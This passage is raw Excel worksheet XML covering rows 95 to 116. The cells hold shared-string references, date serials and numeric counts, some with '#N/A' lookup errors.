        <v>3</v>
      </c>
      <c r="V95" s="82">
        <v>6344</v>
      </c>
      <c r="W95" s="1" t="s">
        <v>2080</v>
      </c>
    </row>
    <row r="96" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A96" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B96" s="51">
        <v>43663.66226341435</v>
      </c>
      <c r="C96" s="1" t="s">
        <v>2177</v>
      </c>
      <c r="D96" s="26">
        <v>1313</v>
      </c>
      <c r="E96" s="1" t="s">
        <v>2222</v>
      </c>
      <c r="F96" s="26">
        <v>105</v>
      </c>
      <c r="G96" s="57" t="s">
        <v>2223</v>
      </c>
      <c r="H96" s="1" t="s">
        <v>2224</v>
      </c>
      <c r="I96" s="1" t="s">
        <v>185</v>
      </c>
      <c r="J96" s="1" t="s">
        <v>186</v>
      </c>
      <c r="K96" s="1" t="s">
        <v>22</v>
      </c>
      <c r="L96" s="16" t="s">
        <v>77</v>
      </c>
      <c r="M96" s="1" t="s">
        <v>1831</v>
      </c>
      <c r="N96" s="1"/>
      <c r="O96" s="1"/>
      <c r="P96" s="1"/>
      <c r="Q96" s="1" t="s">
        <v>3647</v>
      </c>
      <c r="R96" s="82">
        <v>82</v>
      </c>
      <c r="S96" s="82">
        <v>54</v>
      </c>
      <c r="T96" s="82">
        <v>1180</v>
      </c>
      <c r="U96" s="82">
        <v>2028</v>
      </c>
      <c r="V96" s="82">
        <v>8587</v>
      </c>
      <c r="W96" s="1" t="s">
        <v>2080</v>
      </c>
    </row>
    <row r="97" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A97" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B97" s="51">
        <v>43669.752765289355</v>
      </c>
      <c r="C97" s="1" t="s">
        <v>2177</v>
      </c>
      <c r="D97" s="26">
        <v>1313</v>
      </c>
      <c r="E97" s="1" t="s">
        <v>2225</v>
      </c>
      <c r="F97" s="26">
        <v>103</v>
      </c>
      <c r="G97" s="57" t="s">
        <v>2226</v>
      </c>
      <c r="H97" s="1" t="s">
        <v>2227</v>
      </c>
      <c r="I97" s="1" t="s">
        <v>185</v>
      </c>
      <c r="J97" s="1" t="s">
        <v>186</v>
      </c>
      <c r="K97" s="1" t="s">
        <v>22</v>
      </c>
      <c r="L97" s="16" t="s">
        <v>77</v>
      </c>
      <c r="M97" s="1" t="s">
        <v>1831</v>
      </c>
      <c r="N97" s="1"/>
      <c r="O97" s="1"/>
      <c r="P97" s="1"/>
      <c r="Q97" s="1" t="s">
        <v>3647</v>
      </c>
      <c r="R97" s="82">
        <v>9558</v>
      </c>
      <c r="S97" s="82">
        <v>8918</v>
      </c>
      <c r="T97" s="82">
        <v>187478</v>
      </c>
      <c r="U97" s="82">
        <v>302564</v>
      </c>
      <c r="V97" s="82">
        <v>347959</v>
      </c>
      <c r="W97" s="1" t="s">
        <v>2080</v>
      </c>
    </row>
    <row r="98" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A98" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B98" s="51">
        <v>43719.397825092594</v>
      </c>
      <c r="C98" s="1" t="s">
        <v>2177</v>
      </c>
      <c r="D98" s="26">
        <v>1313</v>
      </c>
      <c r="E98" s="1" t="s">
        <v>2228</v>
      </c>
      <c r="F98" s="26">
        <v>107</v>
      </c>
      <c r="G98" s="57" t="s">
        <v>2229</v>
      </c>
      <c r="H98" s="1" t="s">
        <v>2230</v>
      </c>
      <c r="I98" s="1" t="s">
        <v>185</v>
      </c>
      <c r="J98" s="1" t="s">
        <v>186</v>
      </c>
      <c r="K98" s="1" t="s">
        <v>22</v>
      </c>
      <c r="L98" s="16" t="s">
        <v>77</v>
      </c>
      <c r="M98" s="1" t="s">
        <v>1831</v>
      </c>
      <c r="N98" s="1"/>
      <c r="O98" s="1"/>
      <c r="P98" s="1"/>
      <c r="Q98" s="1" t="s">
        <v>3647</v>
      </c>
      <c r="R98" s="82">
        <v>72963</v>
      </c>
      <c r="S98" s="82">
        <v>75377</v>
      </c>
      <c r="T98" s="82">
        <v>1733982</v>
      </c>
      <c r="U98" s="82">
        <v>2635731</v>
      </c>
      <c r="V98" s="82">
        <v>2662445</v>
      </c>
      <c r="W98" s="1" t="s">
        <v>2080</v>
      </c>
    </row>
    <row r="99" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A99" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B99" s="51">
        <v>43663.662263402781</v>
      </c>
      <c r="C99" s="1" t="s">
        <v>2177</v>
      </c>
      <c r="D99" s="26">
        <v>1313</v>
      </c>
      <c r="E99" s="1" t="s">
        <v>2231</v>
      </c>
      <c r="F99" s="26">
        <v>107</v>
      </c>
      <c r="G99" s="57" t="s">
        <v>2232</v>
      </c>
      <c r="H99" s="1" t="s">
        <v>2233</v>
      </c>
      <c r="I99" s="1" t="s">
        <v>185</v>
      </c>
      <c r="J99" s="1" t="s">
        <v>186</v>
      </c>
      <c r="K99" s="1" t="s">
        <v>22</v>
      </c>
      <c r="L99" s="16" t="s">
        <v>77</v>
      </c>
      <c r="M99" s="1" t="s">
        <v>1831</v>
      </c>
      <c r="N99" s="1"/>
      <c r="O99" s="1"/>
      <c r="P99" s="1"/>
      <c r="Q99" s="1" t="s">
        <v>3647</v>
      </c>
      <c r="R99" s="82">
        <v>15</v>
      </c>
      <c r="S99" s="82">
        <v>15</v>
      </c>
      <c r="T99" s="82">
        <v>3265</v>
      </c>
      <c r="U99" s="82">
        <v>5408</v>
      </c>
      <c r="V99" s="82">
        <v>5312</v>
      </c>
      <c r="W99" s="1" t="s">
        <v>2080</v>
      </c>
    </row>
    <row r="100" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A100" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B100" s="51">
        <v>43889.399719895831</v>
      </c>
      <c r="C100" s="1" t="s">
        <v>2234</v>
      </c>
      <c r="D100" s="26">
        <v>110</v>
      </c>
      <c r="E100" s="1" t="s">
        <v>2235</v>
      </c>
      <c r="F100" s="26">
        <v>110</v>
      </c>
      <c r="G100" s="57" t="s">
        <v>2236</v>
      </c>
      <c r="H100" s="1" t="s">
        <v>2237</v>
      </c>
      <c r="I100" s="1" t="s">
        <v>156</v>
      </c>
      <c r="J100" s="1" t="s">
        <v>301</v>
      </c>
      <c r="K100" s="1" t="s">
        <v>26</v>
      </c>
      <c r="L100" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M100" s="1" t="s">
        <v>475</v>
      </c>
      <c r="N100" s="1" t="s">
        <v>476</v>
      </c>
      <c r="O100" s="1"/>
      <c r="P100" s="1"/>
      <c r="Q100" s="1" t="s">
        <v>3648</v>
      </c>
      <c r="R100" s="82">
        <v>414</v>
      </c>
      <c r="S100" s="82">
        <v>390</v>
      </c>
      <c r="T100" s="82">
        <v>6921</v>
      </c>
      <c r="U100" s="82">
        <v>12382</v>
      </c>
      <c r="V100" s="82">
        <v>16420</v>
      </c>
      <c r="W100" s="1" t="s">
        <v>2080</v>
      </c>
    </row>
    <row r="101" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A101" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B101" s="51">
        <v>43883.342491793985</v>
      </c>
      <c r="C101" s="1" t="s">
        <v>199</v>
      </c>
      <c r="D101" s="26">
        <v>110</v>
      </c>
      <c r="E101" s="1" t="s">
        <v>205</v>
      </c>
      <c r="F101" s="26">
        <v>110</v>
      </c>
      <c r="G101" s="57" t="s">
        <v>206</v>
      </c>
      <c r="H101" s="1" t="s">
        <v>202</v>
      </c>
      <c r="I101" s="1" t="s">
        <v>203</v>
      </c>
      <c r="J101" s="1" t="s">
        <v>204</v>
      </c>
      <c r="K101" s="1" t="s">
        <v>16</v>
      </c>
      <c r="L101" s="1" t="s">
        <v>83</v>
      </c>
      <c r="M101" s="1" t="s">
        <v>72</v>
      </c>
      <c r="N101" s="1"/>
      <c r="O101" s="1"/>
      <c r="P101" s="1"/>
      <c r="Q101" s="1" t="s">
        <v>3653</v>
      </c>
      <c r="R101" s="82">
        <v>2</v>
      </c>
      <c r="S101" s="82">
        <v>4</v>
      </c>
      <c r="T101" s="82">
        <v>2632</v>
      </c>
      <c r="U101" s="82">
        <v>3818</v>
      </c>
      <c r="V101" s="82">
        <v>144415</v>
      </c>
      <c r="W101" s="1" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="102" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A102" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B102" s="51">
        <v>43523.642920231483</v>
      </c>
      <c r="C102" s="1" t="s">
        <v>468</v>
      </c>
      <c r="D102" s="26">
        <v>301</v>
      </c>
      <c r="E102" s="1" t="s">
        <v>469</v>
      </c>
      <c r="F102" s="26">
        <v>301</v>
      </c>
      <c r="G102" s="57" t="s">
        <v>470</v>
      </c>
      <c r="H102" s="1" t="s">
        <v>474</v>
      </c>
      <c r="I102" s="1" t="s">
        <v>156</v>
      </c>
      <c r="J102" s="1" t="s">
        <v>301</v>
      </c>
      <c r="K102" s="1" t="s">
        <v>26</v>
      </c>
      <c r="L102" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M102" s="1" t="s">
        <v>475</v>
      </c>
      <c r="N102" s="1" t="s">
        <v>476</v>
      </c>
      <c r="O102" s="1" t="s">
        <v>477</v>
      </c>
      <c r="P102" s="1"/>
      <c r="Q102" s="1" t="s">
        <v>478</v>
      </c>
      <c r="R102" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="S102" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="T102" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="U102" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="V102" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="W102" s="1" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="103" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A103" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B103" s="51">
        <v>43523.642920254628</v>
      </c>
      <c r="C103" s="1" t="s">
        <v>468</v>
      </c>
      <c r="D103" s="26">
        <v>301</v>
      </c>
      <c r="E103" s="1" t="s">
        <v>487</v>
      </c>
      <c r="F103" s="26">
        <v>301</v>
      </c>
      <c r="G103" s="57" t="s">
        <v>488</v>
      </c>
      <c r="H103" s="1" t="s">
        <v>489</v>
      </c>
      <c r="I103" s="1" t="s">
        <v>156</v>
      </c>
      <c r="J103" s="1" t="s">
        <v>301</v>
      </c>
      <c r="K103" s="1" t="s">
        <v>26</v>
      </c>
      <c r="L103" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M103" s="1" t="s">
        <v>475</v>
      </c>
      <c r="N103" s="1" t="s">
        <v>476</v>
      </c>
      <c r="O103" s="1" t="s">
        <v>490</v>
      </c>
      <c r="P103" s="1"/>
      <c r="Q103" s="1" t="s">
        <v>478</v>
      </c>
      <c r="R103" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="S103" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="T103" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="U103" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="V103" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="W103" s="1" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="104" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A104" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B104" s="51">
        <v>43523.64292027778</v>
      </c>
      <c r="C104" s="1" t="s">
        <v>468</v>
      </c>
      <c r="D104" s="26">
        <v>301</v>
      </c>
      <c r="E104" s="1" t="s">
        <v>491</v>
      </c>
      <c r="F104" s="26">
        <v>101</v>
      </c>
      <c r="G104" s="57" t="s">
        <v>492</v>
      </c>
      <c r="H104" s="1" t="s">
        <v>493</v>
      </c>
      <c r="I104" s="1" t="s">
        <v>156</v>
      </c>
      <c r="J104" s="1" t="s">
        <v>301</v>
      </c>
      <c r="K104" s="1" t="s">
        <v>26</v>
      </c>
      <c r="L104" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M104" s="1" t="s">
        <v>475</v>
      </c>
      <c r="N104" s="1" t="s">
        <v>476</v>
      </c>
      <c r="O104" s="1" t="s">
        <v>477</v>
      </c>
      <c r="P104" s="1"/>
      <c r="Q104" s="1" t="s">
        <v>478</v>
      </c>
      <c r="R104" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="S104" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="T104" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="U104" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="V104" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="W104" s="1" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="105" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A105" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B105" s="51">
        <v>44048.487136076386</v>
      </c>
      <c r="C105" s="1" t="s">
        <v>1231</v>
      </c>
      <c r="D105" s="26">
        <v>101</v>
      </c>
      <c r="E105" s="1" t="s">
        <v>1232</v>
      </c>
      <c r="F105" s="26">
        <v>101</v>
      </c>
      <c r="G105" s="57" t="s">
        <v>1233</v>
      </c>
      <c r="H105" s="1" t="s">
        <v>1234</v>
      </c>
      <c r="I105" s="1" t="s">
        <v>172</v>
      </c>
      <c r="J105" s="1" t="s">
        <v>173</v>
      </c>
      <c r="K105" s="1" t="s">
        <v>13</v>
      </c>
      <c r="L105" s="16" t="s">
        <v>83</v>
      </c>
      <c r="M105" s="1" t="s">
        <v>72</v>
      </c>
      <c r="N105" s="1"/>
      <c r="O105" s="1" t="s">
        <v>1235</v>
      </c>
      <c r="P105" s="1" t="s">
        <v>951</v>
      </c>
      <c r="Q105" s="1" t="s">
        <v>3654</v>
      </c>
      <c r="R105" s="82">
        <v>26258</v>
      </c>
      <c r="S105" s="82">
        <v>18066</v>
      </c>
      <c r="T105" s="82">
        <v>117011</v>
      </c>
      <c r="U105" s="82">
        <v>183486</v>
      </c>
      <c r="V105" s="82">
        <v>177912</v>
      </c>
      <c r="W105" s="1" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="106" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A106" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B106" s="51">
        <v>44070.571136736115</v>
      </c>
      <c r="C106" s="1" t="s">
        <v>1417</v>
      </c>
      <c r="D106" s="26">
        <v>100</v>
      </c>
      <c r="E106" s="1" t="s">
        <v>1418</v>
      </c>
      <c r="F106" s="26">
        <v>100</v>
      </c>
      <c r="G106" s="57" t="s">
        <v>1419</v>
      </c>
      <c r="H106" s="1" t="s">
        <v>1420</v>
      </c>
      <c r="I106" s="1" t="s">
        <v>17</v>
      </c>
      <c r="J106" s="1" t="s">
        <v>1412</v>
      </c>
      <c r="K106" s="1" t="s">
        <v>36</v>
      </c>
      <c r="L106" s="16" t="s">
        <v>83</v>
      </c>
      <c r="M106" s="1" t="s">
        <v>72</v>
      </c>
      <c r="N106" s="1"/>
      <c r="O106" s="1"/>
      <c r="P106" s="1"/>
      <c r="Q106" s="1" t="s">
        <v>3655</v>
      </c>
      <c r="R106" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="S106" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="T106" s="82">
        <v>1748</v>
      </c>
      <c r="U106" s="82">
        <v>2877</v>
      </c>
      <c r="V106" s="82">
        <v>4520</v>
      </c>
      <c r="W106" s="1" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="107" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A107" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B107" s="51">
        <v>43971.465269837965</v>
      </c>
      <c r="C107" s="1" t="s">
        <v>1733</v>
      </c>
      <c r="D107" s="26">
        <v>101</v>
      </c>
      <c r="E107" s="1" t="s">
        <v>1734</v>
      </c>
      <c r="F107" s="26">
        <v>101</v>
      </c>
      <c r="G107" s="57" t="s">
        <v>1735</v>
      </c>
      <c r="H107" s="1" t="s">
        <v>1736</v>
      </c>
      <c r="I107" s="1" t="s">
        <v>31</v>
      </c>
      <c r="J107" s="1" t="s">
        <v>262</v>
      </c>
      <c r="K107" s="1" t="s">
        <v>31</v>
      </c>
      <c r="L107" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M107" s="1" t="s">
        <v>262</v>
      </c>
      <c r="N107" s="1" t="s">
        <v>263</v>
      </c>
      <c r="O107" s="1"/>
      <c r="P107" s="1"/>
      <c r="Q107" s="1" t="s">
        <v>3656</v>
      </c>
      <c r="R107" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="S107" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="T107" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="U107" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="V107" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="W107" s="1" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="108" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A108" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B108" s="51">
        <v>43984.924520972221</v>
      </c>
      <c r="C108" s="1" t="s">
        <v>1769</v>
      </c>
      <c r="D108" s="26">
        <v>102</v>
      </c>
      <c r="E108" s="1" t="s">
        <v>1775</v>
      </c>
      <c r="F108" s="26">
        <v>102</v>
      </c>
      <c r="G108" s="57" t="s">
        <v>1776</v>
      </c>
      <c r="H108" s="1" t="s">
        <v>1777</v>
      </c>
      <c r="I108" s="1" t="s">
        <v>82</v>
      </c>
      <c r="J108" s="1" t="s">
        <v>744</v>
      </c>
      <c r="K108" s="1" t="s">
        <v>24</v>
      </c>
      <c r="L108" s="16" t="s">
        <v>83</v>
      </c>
      <c r="M108" s="1" t="s">
        <v>72</v>
      </c>
      <c r="N108" s="1"/>
      <c r="O108" s="1" t="s">
        <v>1778</v>
      </c>
      <c r="P108" s="1" t="s">
        <v>745</v>
      </c>
      <c r="Q108" s="1" t="s">
        <v>3657</v>
      </c>
      <c r="R108" s="82">
        <v>383</v>
      </c>
      <c r="S108" s="82">
        <v>213</v>
      </c>
      <c r="T108" s="82">
        <v>1430</v>
      </c>
      <c r="U108" s="82">
        <v>2558</v>
      </c>
      <c r="V108" s="82">
        <v>3151</v>
      </c>
      <c r="W108" s="1" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="109" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A109" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B109" s="51">
        <v>44041.707096238424</v>
      </c>
      <c r="C109" s="1" t="s">
        <v>2072</v>
      </c>
      <c r="D109" s="26">
        <v>101</v>
      </c>
      <c r="E109" s="1" t="s">
        <v>2073</v>
      </c>
      <c r="F109" s="26">
        <v>101</v>
      </c>
      <c r="G109" s="57" t="s">
        <v>2074</v>
      </c>
      <c r="H109" s="1" t="s">
        <v>146</v>
      </c>
      <c r="I109" s="1" t="s">
        <v>103</v>
      </c>
      <c r="J109" s="1" t="s">
        <v>147</v>
      </c>
      <c r="K109" s="16" t="s">
        <v>35</v>
      </c>
      <c r="L109" s="16" t="s">
        <v>83</v>
      </c>
      <c r="M109" s="1" t="s">
        <v>148</v>
      </c>
      <c r="N109" s="1" t="s">
        <v>149</v>
      </c>
      <c r="O109" s="1" t="s">
        <v>150</v>
      </c>
      <c r="P109" s="1"/>
      <c r="Q109" s="1" t="s">
        <v>151</v>
      </c>
      <c r="R109" s="82">
        <v>108</v>
      </c>
      <c r="S109" s="82">
        <v>33</v>
      </c>
      <c r="T109" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="U109" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="V109" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="W109" s="1" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="110" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A110" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B110" s="51">
        <v>44200.399547685185</v>
      </c>
      <c r="C110" s="1" t="s">
        <v>2309</v>
      </c>
      <c r="D110" s="26">
        <v>110</v>
      </c>
      <c r="E110" s="1" t="s">
        <v>2310</v>
      </c>
      <c r="F110" s="26">
        <v>110</v>
      </c>
      <c r="G110" s="57" t="s">
        <v>2311</v>
      </c>
      <c r="H110" s="1" t="s">
        <v>2296</v>
      </c>
      <c r="I110" s="1" t="s">
        <v>203</v>
      </c>
      <c r="J110" s="1" t="s">
        <v>204</v>
      </c>
      <c r="K110" s="1" t="s">
        <v>24</v>
      </c>
      <c r="L110" s="1" t="s">
        <v>83</v>
      </c>
      <c r="M110" s="1" t="s">
        <v>72</v>
      </c>
      <c r="N110" s="1"/>
      <c r="O110" s="1"/>
      <c r="P110" s="1"/>
      <c r="Q110" s="1" t="s">
        <v>2312</v>
      </c>
      <c r="R110" s="82">
        <v>8</v>
      </c>
      <c r="S110" s="82">
        <v>1</v>
      </c>
      <c r="T110" s="82">
        <v>11</v>
      </c>
      <c r="U110" s="82">
        <v>11</v>
      </c>
      <c r="V110" s="82">
        <v>42</v>
      </c>
      <c r="W110" s="1" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="111" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A111" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B111" s="51">
        <v>43971.46526986111</v>
      </c>
      <c r="C111" s="1" t="s">
        <v>1733</v>
      </c>
      <c r="D111" s="26">
        <v>101</v>
      </c>
      <c r="E111" s="1" t="s">
        <v>2392</v>
      </c>
      <c r="F111" s="26">
        <v>101</v>
      </c>
      <c r="G111" s="57" t="s">
        <v>2393</v>
      </c>
      <c r="H111" s="1" t="s">
        <v>2394</v>
      </c>
      <c r="I111" s="1" t="s">
        <v>31</v>
      </c>
      <c r="J111" s="1" t="s">
        <v>262</v>
      </c>
      <c r="K111" s="1" t="s">
        <v>31</v>
      </c>
      <c r="L111" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M111" s="1" t="s">
        <v>262</v>
      </c>
      <c r="N111" s="1" t="s">
        <v>263</v>
      </c>
      <c r="O111" s="1"/>
      <c r="P111" s="1"/>
      <c r="Q111" s="1" t="s">
        <v>3656</v>
      </c>
      <c r="R111" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="S111" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="T111" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="U111" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="V111" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="W111" s="1" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="112" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A112" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B112" s="51">
        <v>43840.498662662038</v>
      </c>
      <c r="C112" s="1" t="s">
        <v>2574</v>
      </c>
      <c r="D112" s="26">
        <v>101</v>
      </c>
      <c r="E112" s="16" t="s">
        <v>2575</v>
      </c>
      <c r="F112" s="26">
        <v>101</v>
      </c>
      <c r="G112" s="57" t="s">
        <v>2576</v>
      </c>
      <c r="H112" s="1" t="s">
        <v>2577</v>
      </c>
      <c r="I112" s="1" t="s">
        <v>179</v>
      </c>
      <c r="J112" s="1" t="s">
        <v>180</v>
      </c>
      <c r="K112" s="1" t="s">
        <v>19</v>
      </c>
      <c r="L112" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M112" s="1"/>
      <c r="N112" s="1"/>
      <c r="O112" s="1" t="s">
        <v>2578</v>
      </c>
      <c r="P112" s="1" t="s">
        <v>181</v>
      </c>
      <c r="Q112" s="1" t="s">
        <v>3658</v>
      </c>
      <c r="R112" s="82">
        <v>11</v>
      </c>
      <c r="S112" s="82">
        <v>8</v>
      </c>
      <c r="T112" s="82">
        <v>43</v>
      </c>
      <c r="U112" s="82">
        <v>73</v>
      </c>
      <c r="V112" s="82">
        <v>56</v>
      </c>
      <c r="W112" s="1" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="113" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A113" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B113" s="51">
        <v>43985.648306261573</v>
      </c>
      <c r="C113" s="1" t="s">
        <v>2744</v>
      </c>
      <c r="D113" s="26">
        <v>124</v>
      </c>
      <c r="E113" s="1" t="s">
        <v>2745</v>
      </c>
      <c r="F113" s="26">
        <v>104</v>
      </c>
      <c r="G113" s="57" t="s">
        <v>2746</v>
      </c>
      <c r="H113" s="1" t="s">
        <v>2747</v>
      </c>
      <c r="I113" s="1" t="s">
        <v>103</v>
      </c>
      <c r="J113" s="1" t="s">
        <v>147</v>
      </c>
      <c r="K113" s="16" t="s">
        <v>35</v>
      </c>
      <c r="L113" s="16" t="s">
        <v>83</v>
      </c>
      <c r="M113" s="1" t="s">
        <v>148</v>
      </c>
      <c r="N113" s="1" t="s">
        <v>149</v>
      </c>
      <c r="O113" s="1"/>
      <c r="P113" s="1" t="s">
        <v>2748</v>
      </c>
      <c r="Q113" s="1" t="s">
        <v>3659</v>
      </c>
      <c r="R113" s="82">
        <v>178</v>
      </c>
      <c r="S113" s="82">
        <v>181</v>
      </c>
      <c r="T113" s="82">
        <v>1721</v>
      </c>
      <c r="U113" s="82">
        <v>3182</v>
      </c>
      <c r="V113" s="82">
        <v>4031</v>
      </c>
      <c r="W113" s="1" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="114" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A114" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B114" s="51">
        <v>43908.853579537034</v>
      </c>
      <c r="C114" s="1" t="s">
        <v>2744</v>
      </c>
      <c r="D114" s="26">
        <v>124</v>
      </c>
      <c r="E114" s="1" t="s">
        <v>2750</v>
      </c>
      <c r="F114" s="26">
        <v>102</v>
      </c>
      <c r="G114" s="57" t="s">
        <v>2751</v>
      </c>
      <c r="H114" s="1" t="s">
        <v>2752</v>
      </c>
      <c r="I114" s="1" t="s">
        <v>103</v>
      </c>
      <c r="J114" s="1" t="s">
        <v>147</v>
      </c>
      <c r="K114" s="16" t="s">
        <v>35</v>
      </c>
      <c r="L114" s="16" t="s">
        <v>83</v>
      </c>
      <c r="M114" s="1" t="s">
        <v>148</v>
      </c>
      <c r="N114" s="1" t="s">
        <v>149</v>
      </c>
      <c r="O114" s="1"/>
      <c r="P114" s="1" t="s">
        <v>2748</v>
      </c>
      <c r="Q114" s="1" t="s">
        <v>3659</v>
      </c>
      <c r="R114" s="82">
        <v>3</v>
      </c>
      <c r="S114" s="82">
        <v>8</v>
      </c>
      <c r="T114" s="82">
        <v>899</v>
      </c>
      <c r="U114" s="82">
        <v>1514</v>
      </c>
      <c r="V114" s="82">
        <v>2345</v>
      </c>
      <c r="W114" s="1" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="115" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A115" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B115" s="51">
        <v>43908.853579606483</v>
      </c>
      <c r="C115" s="1" t="s">
        <v>2744</v>
      </c>
      <c r="D115" s="26">
        <v>124</v>
      </c>
      <c r="E115" s="1" t="s">
        <v>2753</v>
      </c>
      <c r="F115" s="26">
        <v>102</v>
      </c>
      <c r="G115" s="57" t="s">
        <v>2754</v>
      </c>
      <c r="H115" s="1" t="s">
        <v>2755</v>
      </c>
      <c r="I115" s="1" t="s">
        <v>103</v>
      </c>
      <c r="J115" s="1" t="s">
        <v>147</v>
      </c>
      <c r="K115" s="16" t="s">
        <v>35</v>
      </c>
      <c r="L115" s="16" t="s">
        <v>83</v>
      </c>
      <c r="M115" s="1" t="s">
        <v>148</v>
      </c>
      <c r="N115" s="1" t="s">
        <v>149</v>
      </c>
      <c r="O115" s="1"/>
      <c r="P115" s="1" t="s">
        <v>2748</v>
      </c>
      <c r="Q115" s="1" t="s">
        <v>3659</v>
      </c>
      <c r="R115" s="82">
        <v>3</v>
      </c>
      <c r="S115" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="T115" s="82">
        <v>874</v>
      </c>
      <c r="U115" s="82">
        <v>1440</v>
      </c>
      <c r="V115" s="82">
        <v>2305</v>
      </c>
      <c r="W115" s="1" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="116" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A116" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B116" s="51">
        <v>43889.707511701388</v>
      </c>
      <c r="C116" s="1" t="s">
        <v>2744</v>
      </c>
      <c r="D116" s="26">
        <v>124</v>
      </c>
      <c r="E116" s="1" t="s">
        <v>2756</v>
      </c>
      <c r="F116" s="26">
        <v>102</v>
      </c>
      <c r="G116" s="57" t="s">
        <v>2757</v>
      </c>
      <c r="H116" s="1" t="s">
        <v>2758</v>
      </c>
      <c r="I116" s="1" t="s">
        <v>103</v>
      </c>
      <c r="J116" s="1" t="s">
        <v>147</v>
      </c>
      <c r="K116" s="16" t="s">
        <v>35</v>
      </c>
      <c r="L116" s="16" t="s">
        <v>83</v>
      </c>
